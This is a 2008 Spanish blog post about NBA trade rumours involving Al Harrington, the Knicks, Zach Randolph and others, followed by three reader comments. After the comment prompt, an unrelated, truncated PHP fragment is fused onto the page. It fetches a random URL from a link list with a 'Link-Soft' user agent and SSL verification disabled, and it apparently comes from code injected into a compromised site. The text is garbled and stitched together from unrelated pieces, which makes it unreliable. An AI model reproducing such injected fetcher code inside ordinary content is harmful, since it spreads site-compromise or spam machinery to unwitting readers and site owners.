¿Al Harrington nuevo jugador de los Knicks?

21 de November de 2008 por txusma

Ya hace semanas que el jugador de los Warriors Al Harrington, había pedido públicamente el traspaso al no estar de acuerdo con el rol que había definido para él Don Nelson. Ya el año pasado el ala-pívot se había quedado fuera de la rotación en determinados partidos de la liga regular, algo que su ego de super estrella no supo ni quiso asimilar. En ningún momento los Warriors se negaron al traspaso y aparecieron varios rumores entre los que se contemplaba un retorno a los Pacers a cambio de Jamaal Tinsley. Tambien se habló de un posible intercambio con Eddie Curry, a pesar de que no entendemos como podría acoplarse Eddie Curry al rápido estilo de juego de los Warriors.

Finalmente, Harrington acabará en los Knicks pero no a cambio de Curry sino del expiring de Malik Rose. Este movimiento no compromete para nada el plan original de Donnie Walsh (optar a la contratación de Lebron James el verano de 2010) porque a Harrington tan solo le quedan 2 años de contrato. Ahora la pregunta es que significará este movimiento para el equipo de Mike D’Antoni: ¿Entrará en el quinteto como ala-pívot en el lugar de Wilson Chandler? ¿Entrará en el quinteto pero el jugador desplazado será Quentin Richardson? ¿Saldrá desde el banco y de esta manera David Lee verá reducidos sus minutos de juego? ¿Zach Randolph tiene ahora más números para ser traspasado?

EDICIÓN: Los rumores se suceden y es que el traspaso de Al Harrington a NY puede desencadenar como ya intuíamos el de Zach Randolph. En las últimas horas se comenta que el ala-pívot de los Warriors podría llegar al Madison a cambio de Jamaal Crawford y Malik Allen y que Zach Randolph se iría a los Clippers (¿Implicaría esto la salida de Kaman?) en un traspaso donde los Knicks recibirían a Cuttino Mobley y Tim Thomas. Más limite salarial de cara al 2010 para NY.

Y tenemos más rumores:

– Media liga ha preguntado por Chris Kaman pero parece que los más insistentes están siendo los Charlotte Bobcats. Seguro que Gerald Wallace está incluído en la operación.

– Hablando de Gerald Wallace, parece ser que los Nets están muy interesados en él. Como los Bobcats buscan potenciar su juego interior, New Jersey está ofreciendo a Sean Williams y Josh Boone.

– Los Cleveland Cavaliers son los que más dinero están poniendo encima de la mesa para hacerse con los servicios de Antonio McDyess pero también pujan fuerte los… Charlotte Bobcats. En todo caso, los Detroit Pistons siguen siendo los favoritos para firmar al jugador a partir del 7 de diciembre.

Comenta

3 comentarios a esta entrada

  1. Txusma dice:
    #1

    Pues en breve podemos tener la respuesta de Don Nelson a la pregunta de DeerHunter del otro día. Con Crawford en el equipo, ¿quién se quedaría fuera? ¿Y cómo se come un Ellis-Crawford?

      Citar

  2. SundayDriver dice:
    #2

    Bueno, si buscan ampliar límite salarial y, de paso, tirar la temporada para optar a otra ronda buena (para luego fichar al Gallinari de turno), pudiera entenderse. Pero ahora que llevaban una temporada decente…supongo que Cabra Loca Robinson cogerá la titularidad, y lo único bueno, si al final largan a Zach, es que Lee tendrá más importancia, y supongo que Richardson también. No veo a Mobley y Thomas aportando nada…

      Citar

  3. xapa_croack dice:
    #3

    Parece k estan intentado sacar a zacarias, le han hecho una oferta a los clippers que seria Tim thomas+ Cuttino Mobley.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>